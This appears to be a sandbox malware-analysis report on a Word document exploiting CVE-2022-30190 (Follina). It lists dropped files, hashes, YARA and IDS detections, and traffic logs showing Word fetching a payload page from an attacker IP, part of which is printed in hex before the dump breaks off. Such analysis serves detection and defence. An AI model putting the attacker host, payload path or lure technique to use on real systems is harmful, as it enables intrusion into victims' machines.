        Preview:......M.eFy...z...v.JL..mc..'.S,...X.F...Fa.q..............................(...`F.9..............kgt~.k.G.f.[.).fP>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.9727198870722877
        Encrypted:false
        SSDEEP:3:yVlgsRlzCROa55VlJQwXuZ1jyjlRV8S27276:yPblzCR75B/E4ZIh22
        MD5:FF0683B5DA4293A1DE54EDCB8D4E8C1A
        SHA1:58322D98937093F90642D2220C7A4A1318A4629B
        SHA-256:30434BFC15C74DFA64C6C8DB56C4118A9D99D913B6578D04A1825DF5CF27B2DF
        SHA-512:2BD5A3A95B1F607F1065F74EB1FED9EBF3EA7B7C91388E15E090644E30D875E21AEF4ADE4F8122596AEE6CB9DAA490C7E1DB3C53E80BA92AD1100799AED988EA
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.4.A.9.B.E.E.D.A.-.1.6.2.0.-.4.1.E.C.-.8.5.E.7.-.8.F.2.F.9.F.4.B.2.1.C.8.}...F.S.D..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
        Category:downloaded
        Size (bytes):6241
        Entropy (8bit):4.836014560592255
        Encrypted:false
        SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
        MD5:A32050027AEA96B3B70E1056490A98C9
        SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
        SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
        SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
        Malicious:true
        Yara Hits:
        • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, Author: Joe Security
        Reputation:low
        IE Cache URL:http://185.234.247.119/123.RES
        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
        Category:dropped
        Size (bytes):6241
        Entropy (8bit):4.836014560592255
        Encrypted:false
        SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
        MD5:A32050027AEA96B3B70E1056490A98C9
        SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
        SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
        SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
        Malicious:true
        Yara Hits:
        • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES, Author: Joe Security
        Reputation:low
        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
        Category:dropped
        Size (bytes):6241
        Entropy (8bit):4.836014560592255
        Encrypted:false
        SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
        MD5:A32050027AEA96B3B70E1056490A98C9
        SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
        SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
        SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
        Malicious:true
        Yara Hits:
        • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES, Author: Joe Security
        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):5632
        Entropy (8bit):2.2195179903071636
        Encrypted:false
        SSDEEP:12:rl3bn+kF/W/mYYaiT21U/hC9KSvuQWyRnNYnRn/5Co00RnNEKn7iv9KS4CI9KS4y:rdW/NK/5QV8nNoWisg6BAKoG8noxoWi
        MD5:3AB3539B70A9B80798F3669AC3483546
        SHA1:346E40AF0E4E582BD90E166E57A8B3A170AC4565
        SHA-256:5DBE81D54C8C3CF70075824A503914BC1C8240574AA22AB7C7B7BC63E1DDD654
        SHA-512:A407CB94888C76D85D50239C97A6CE89BBDB5EEC8FDB5792EEF8FFE56B6110BFF2E86AECC0B7B2C765AFC91BA3A30B3426659E705919BE960A4D37A5118FE40C
        Malicious:false
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):2130
        Entropy (8bit):1.1627960907898713
        Encrypted:false
        SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1PcV5:mbb2sOhYk5vnZA5Rn/YnRn/dom5
        MD5:645EA66E0489C4D8B0D4877F7A930E07
        SHA1:2961C4A1FDD07A4A6EFA47655C6087EB011B079E
        SHA-256:ED0BFA2837448DD790D7C0450339FBAEF480535517847634136BF9F7F0B91468
        SHA-512:0D1E3C8280255B0F329931CE8CE1810DFE32F5DA29A2FD9FE90B907A2546699B955D50519CE310BD63B5D84F5873F5FB3CCB0467FB48E47ABEA16962DC6BAACE
        Malicious:false
        Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025623734588153504
        Encrypted:false
        SSDEEP:6:I3DPc1V27HvxggLRvhGEAflWSks3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPwuDhGEAfASk6vYg3J/
        MD5:B0EA46CCC2FA72CDEA1E8A970318C8C5
        SHA1:E8BB6DFCD4C726B015778B573CE00F8A98D190F7
        SHA-256:85EA4C6C1662274426EAFFE8C190A6F109D86DDF4021D8E4A9E3198F36A551A4
        SHA-512:62C38D380B430EDE994AA1561EE4CC07FD30D99D272A91D8F15B015CDA636C46605A83244CCDE01E87A132F325C7F9EB385AE7B2A9E981A845D8EB1F0B9449D8
        Malicious:false
        Preview:......M.eFy...z.o0.B..N.K....6NS,...X.F...Fa.q.............................1...X.E..^...V........qB..w..D.W.90........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.0256237345881535
        Encrypted:false
        SSDEEP:6:I3DPcbYRvxggLRPqv5ibXbGRXv//4tfnRujlw//+GtluJ/eRuj:I3DPGYdjy5vYg3J/
        MD5:10E67C048099C90E1C0666278470E38A
        SHA1:D5A7F4B209F9732FB77E86F8A668E1512D66C2DB
        SHA-256:D8392841A423C66EA19FB60EA4E550FD547DE47B6A66521A05CB3FCFC5E83492
        SHA-512:BB2C07BF757A5CD6A874F60DD91605CC4C83918A43623466F649DD63BAE75340B2B203EFEBA155C96EEB0E22F4623A82E0D7C3382522046EC7F63302BCC8CAF1
        Malicious:false
        Preview:......M.eFy...z.Q..q.vG.Y......S,...X.F...Fa.q...............................d.s.O.......Q........5.]?..L......CX.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:52 2022, mtime=Tue Mar 8 15:45:52 2022, atime=Wed Jun 8 01:45:12 2022, length=10144, window=hide
        Category:dropped
        Size (bytes):999
        Entropy (8bit):4.520744870739846
        Encrypted:false
        SSDEEP:12:8nlrgXg/XAlCPCHaXWBlXB/eLX+WqPW/xgitCicvbz6F42NDtZ3YilMMEpxRljK1:8f/XTm3MgPW/xftJekxDv3qa+Y7h
        MD5:04594E11A8EF65860D389E40AB032796
        SHA1:AA6792F586717AD57B20FD67B505E50D5AE0E5A3
        SHA-256:1BC5F3C148CE6BAFA95337883CC3B042968CD04F3BF61453FC99D46199056D8B
        SHA-512:049D931F8E51E9573F8B459018770975916EE6A87B1E9606BC89247CD8875C3FA9D77557D196DA4FE827AC8F3171DD6A37007FB2BABEB910FA872C01A4CDF0BA
        Malicious:false
        Preview:L..................F.... ........3.......3...LR..z...'...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....`.2..'...T.. .DOC782~1.DOC..D......hT..hT..*...r.....'...............d.o.c.7.8.2...d.o.c.x.......u...............-...8...[............?J......C:\Users\..#...................\\760639\Users.user\Desktop\doc782.docx.".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.7.8.2...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......760639..........D_....3N...W...9...N..... .....[D_....3N...W...9...N..... .....[....
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):64
        Entropy (8bit):4.601202445739505
        Encrypted:false
        SSDEEP:3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c
        MD5:538F5016C24249AC1799BBBB20B4BD97
        SHA1:1B0ECD98E7D3BFECA78B00528138FA8D84F35BED
        SHA-256:249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
        SHA-512:E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA
        Malicious:false
        Preview:[folders]..Templates.LNK=0..doc782.LNK=0..[misc]..doc782.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
        MD5:C5E24006AFAC8C2659023AD09A07EB0F
        SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
        SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
        SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l
        MD5:C5E24006AFAC8C2659023AD09A07EB0F
        SHA1:4B7B834BEDADFD0A2764743E021D40C55A51F284
        SHA-256:7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E
        SHA-512:673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396
        Malicious:true
        Preview:.user..................................................A.l.b.u.s.............p........16..............26.............@36..............36.....z.......p46.....x...
        File type:Microsoft OOXML
        Entropy (8bit):7.869060797789825
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
        • ZIP compressed archive (8000/1) 7.92%
        File name:doc782.docx
        File size:10144
        MD5:e7015438268464cedad98b1544d643ad
        SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
        SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
        SHA512:d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad
        SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2
        TLSH:A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C
        File Content Preview:PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p
        Icon Hash:e4e6a2a2a4b4b4a4
        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)8049171185.234.247.119192.168.2.22
        TimestampSource PortDest PortSource IPDest IP
        Jun 7, 2022 19:44:27.159992933 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:27.187441111 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:27.187530041 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:27.187803030 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:27.215111017 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:27.215137959 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:27.215202093 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:32.657025099 CEST4917280192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:32.684343100 CEST8049172185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:32.684530973 CEST4917280192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:32.684813023 CEST4917280192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:32.716893911 CEST8049172185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:32.718305111 CEST8049172185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:32.926908970 CEST4917280192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:36.916021109 CEST4917380192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:36.943603992 CEST8049173185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:36.943826914 CEST4917380192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:36.961354017 CEST4917380192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:36.991600990 CEST8049173185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:36.991637945 CEST8049173185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.030510902 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.058628082 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.058744907 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.058758974 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.058788061 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.058864117 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.058901072 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.058957100 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.058991909 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.059087992 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.059122086 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.201658010 CEST4917380192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.435573101 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.463280916 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.463632107 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.473567963 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.501120090 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.501225948 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.536554098 CEST4917280192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.564064980 CEST8049172185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.579617977 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.607300997 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.607443094 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.778932095 CEST4917280192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.834969997 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:44:37.863265038 CEST8049171185.234.247.119192.168.2.22
        Jun 7, 2022 19:44:37.863425970 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:45:37.891575098 CEST4917280192.168.2.22185.234.247.119
        Jun 7, 2022 19:45:40.323673010 CEST4917180192.168.2.22185.234.247.119
        Jun 7, 2022 19:45:41.990484953 CEST8049173185.234.247.119192.168.2.22
        Jun 7, 2022 19:45:41.990658045 CEST4917380192.168.2.22185.234.247.119
        Jun 7, 2022 19:45:41.990782976 CEST4917380192.168.2.22185.234.247.119
        Jun 7, 2022 19:45:42.018299103 CEST8049173185.234.247.119192.168.2.22
        • 185.234.247.119
        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249171185.234.247.11980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        Jun 7, 2022 19:44:27.187803030 CEST1OUTOPTIONS / HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: 185.234.247.119
        Content-Length: 0
        Connection: Keep-Alive
        Jun 7, 2022 19:44:27.215137959 CEST2INHTTP/1.1 405 Not Allowed
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:27 GMT
        Content-Type: text/html
        Content-Length: 150
        Connection: keep-alive
        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
        Jun 7, 2022 19:44:37.030510902 CEST4OUTGET /123.RES HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: 185.234.247.119
        Connection: Keep-Alive
        Jun 7, 2022 19:44:37.058628082 CEST5INHTTP/1.1 200 OK
        Server: nginx
        Date: Tue, 07 Jun 2022 17:44:37 GMT
        Content-Type: application/octet-stream
        Content-Length: 6241
        Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
        Connection: keep-alive
        ETag: "6299dd5d-1861"
        Accept-Ranges: bytes
        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 